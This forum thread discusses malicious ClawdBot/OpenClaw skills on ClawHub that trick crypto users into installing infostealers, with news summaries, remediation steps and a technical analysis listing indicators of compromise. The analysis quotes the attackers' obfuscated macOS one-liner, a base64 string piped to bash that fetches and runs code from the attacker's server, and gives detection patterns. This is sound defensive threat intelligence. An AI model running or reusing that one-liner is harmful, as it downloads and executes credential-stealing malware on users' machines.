Malware News Malicious ClawdBot Skills Target ByBit, Polymarket, Axiom, Reddit and LinkedIn to Install Malware

[Khushal]

Content source

https://opensourcemalware.com/blog/clawdbot-skills-ganked-your-crypto

Unless you have been living under a rock, you’ve head of ClawdBot and its incredible rise to fame. ClawdBot is an open-source AI personal assistant that runs locally on your device and uses common chat messengers to manage all the things.

Executive Summary
An initial group of 28 malicious skills targeting Claude Code and Moltbot users were published to ClawHub and GitHub between January 27-29, 2026. A second larger group of 386 skills were published January 31-February 2. The skills masquerade as cryptocurrency trading automation tools and deliver information-stealing malware to macOS and Windows systems. All these skills share the same command-and-control infrastructure (91.92.242.30) and use sophisticated social engineering to convince users to execute malicious commands which then steals crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords.

OpenSourceMalware.com - Community Threat Intelligence

Security professionals sharing intelligence on malicious packages, repositories, and CDNs to protect the open source ecosystem.

opensourcemalware.com

From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized

The fastest-growing personal AI agent ecosystem just became a new delivery channel for malware. Over the last few days, VirusTotal has detec...

blog.virustotal.com

 

[Bot]

What you quoted lines up with an active “malicious skills” / supply-chain style abuse of the OpenClaw ecosystem (the project that has recently been referred to as Clawdbot and Moltbot, depending on the time/window and rename). ([blog.virustotal.com](https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html))

What’s confirmed (and what’s likely changing fast)
Different researchers are reporting different counts because the skill registry is changing quickly and because they may be measuring different subsets (e.g., “confirmed malicious” vs “suspicious”). For example:

• A VirusTotal post dated Monday, February 2, 2026 describes “hundreds” of OpenClaw skills showing malicious characteristics and notes they had already analyzed thousands of skills with Code Insight. ([blog.virustotal.com](https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html))
• The Hacker News (Feb 2, 2026) summarizes Koi Security’s audit of 2,857 ClawHub skills, reporting 341 malicious skills, with one major cluster delivering Atomic Stealer (AMOS) on macOS via social-engineering “prerequisites.” ([thehackernews.com](https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html))
• Tom’s Hardware (Feb 1, 2026) describes an earlier wave of at least 14 malicious skills uploaded to ClawHub between January 27–29, disguised as crypto/wallet automation and using obfuscated terminal commands as part of “setup.” ([tomshardware.com](https://www.tomshardware.com/tech-industry/cyber-security/malicious-moltbot-skill-targets-crypto-users-on-clawhub))

So your “28 + 386” numbers may be from a specific write-up/snapshot, but the safest approach is to treat the ecosystem as “under active abuse” right now rather than arguing any single exact count.

How the attack works (high level)
Based on the reporting above, the common pattern is:

• A skill is published with convincing documentation and “setup/prerequisites.”
• The user is instructed to run copy/paste terminal commands (often obfuscated) or download/run an archive/binary.
• That step pulls down and executes additional payloads (including macOS stealers like AMOS), aiming to steal credentials/API keys/wallet data and similar secrets. ([thehackernews.com](https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html))

The big red flag is any skill telling users to run one-liners that fetch/execute remote code (the classic “curl … | sh/bash” style), or to run password-protected zips/binaries as part of “installation.”

Practical guidance for users (what to do now)

If you have NOT run any commands / installed these skills

• Avoid installing skills from public registries unless you can thoroughly review the code and the publisher history.
• Treat skills like executable code with full local access (because in practice, that’s what they are).
• Do not run terminal commands provided by a skill’s documentation unless you fully understand and trust exactly what they do.
• If you must experiment, do it in a disposable VM or on a separate non-sensitive machine/account with no stored crypto/API keys and minimal privileges.

If you DID run the “setup” commands or executed downloaded files
At that point, it’s safest to assume compromise and respond like an infostealer incident:

• Disconnect the affected machine from the network.
• From a known-clean device, rotate passwords and revoke/replace secrets that may have been exposed (exchange API keys, wallet-related keys/seed phrases, SSH keys, browser-stored passwords).
• If crypto assets are involved, move funds to fresh wallets using a clean device/wallet setup (don’t reuse potentially exposed secrets).
• Run reputable on-demand scans (and consider an offline scan where available). If there are strong indicators of compromise, a full OS reinstall is often the most reliable way to recover from stealer-style infections.
• Submit any suspicious downloaded archives/binaries/scripts to VirusTotal for community/vendor analysis (do not upload private keys, seed phrases, or other sensitive files).

Ecosystem note
The Hacker News piece also notes OpenClaw added a reporting feature where skills with multiple unique reports can be auto-hidden, which is helpful—but it doesn’t replace treating third-party skills as untrusted by default. ([thehackernews.com](https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html))

Sources

• From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized
• Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users
• Malicious OpenClaw ‘skill’ targets crypto users on ClawHub — 14 malicious skills were uploaded to ClawHub last month

 

[Wrecker4923]

To me, giving a Claude skill all your credentials, and access to everything important to you, and then managing it all via Telegram seems ludicrous, but who am I to judge.

 

[Sorrento]

I must be living under a rock as I have never heard heard of it, as it seems I'm becoming a luddite rock on, I never thought I was until recently??

 

[Divergent]

Technical Analysis & Remediation

Attack Vector & Tactics (MITRE ATT&CK)

T1195.001
(Supply Chain Compromise) Poisoned open-source skills masquerading as crypto trading bots (e.g., polymarket-trading-bot, binance-agent).

T1204.002
(User Execution: Malicious File) Users are instructed to download and run AuthTool.zip (Windows) or execute a terminal command (macOS) to "authenticate" the skill.

T1059.004
(Command and Scripting Interpreter: Unix Shell) macOS payloads use curl piped to bash to fetch the second stage.

Live Evidence Extraction

C2 Infrastructure

IP: 91[.]92[.]242[.]30

Payload URL (Decoded) hxxps://91[.]92[.]242[.]30/6dec0ptkp49uugo

File Indicators (SHA-256)

macOS Payload (db2w5j5bka6qkxi) 998c38dc30097479bd15a68d9435dc5b98681419739572cadfe1e08581187e

Windows Payload
AuthTool.exe (contained in zip with password 1234)

Malicious Accounts (ClawHub/GitHub)

hightower6eu (Primary, 354 skills)

jordanprater, zaycv, aslaep123, danman0, lvy19811120-gif, gtaiai.

macOS Kill Chain Snippet
The attack uses a fake Apple URL echo to build trust, followed by a base64 encoded execution:

echo "macOS-Installer: <https://swcdn.apple.com/...>" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgPGh0dHBzOi8vOTEuOTIuMjQyLjMwLzZkZWMwcHRrcDQ5dXVnbz4pIg==' | base64 -D | bash

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment

Network Block
Immediately block outbound traffic to 91[.]92[.]242[.]30 at the perimeter firewalls and DNS resolvers.

Inventory Scan
Query endpoints for the existence of ClawdBot instances and specifically scan for the presence of the directory ~/.clawdbot/skills containing metadata from the listed malicious authors.

Process Termination
Hunt for and terminate processes related to AuthTool.exe or suspicious curl | bash parents.

Phase 2: Eradication

File Removal
Delete the binary db2w5j5bka6qkxi (macOS) and AuthTool.exe (Windows).

Credential Rotation
CRITICAL. The malware specifically targets Exchange API keys (env vars/config files), SSH keys (~/.ssh), and AWS/Cloud credentials (.aws/credentials). Force rotation of all potentially exposed secrets.

Phase 3: Recovery

Re-imaging
Due to the stealer's potential to establish persistence (not fully detailed but likely given the access level), re-imaging affected developer workstations is recommended.

Validation
Verify clean ClawdBot installations only from verified sources (though even official repos show signs of slow moderation).

Phase 4: Lessons Learned

Policy Update
Ban the use of "ClawdBot" or similar AI agents that execute local code until an approved software list (ASL) governance model is applied.

Detection
Implement SIEM rules for xattr -c followed by chmod +x execution sequences in user temp directories.

Remediation - THE HOME USER TRACK

Priority 1
Safety (Stop the Bleeding)

Disconnect your device from the internet immediately.

If you ran a command starting with echo "macOS-Installer... or downloaded AuthTool.zip, you are compromised.

Priority 2: Identity (The "Ganked" Check)
Use a clean, separate device (like your phone) to change passwords.

Crypto
Revoke all API keys on exchanges (ByBit, Polymarket, etc.) immediately. Transfer funds from potentially compromised hot wallets to a new cold wallet.

Accounts
Reset passwords for Reddit, LinkedIn, and email accounts.

Priority 3: Cleanup
Delete the malicious skill folders from your ClawdBot directory.

Run a reputable antivirus scan specifically looking for the hash 998c38dc30097479bd15a68d9435dc5b98681419739572cadfe1e08581187e.

Hardening & References

Baseline
Restrict local AI agents from accessing sensitive directories (.ssh, .aws, .env) via containerization (Docker) or sandbox policies.

Tactical
Monitor for the creation of files matching the pattern macos-stealer-v2-*.

Sources

OpenSource Malware Blog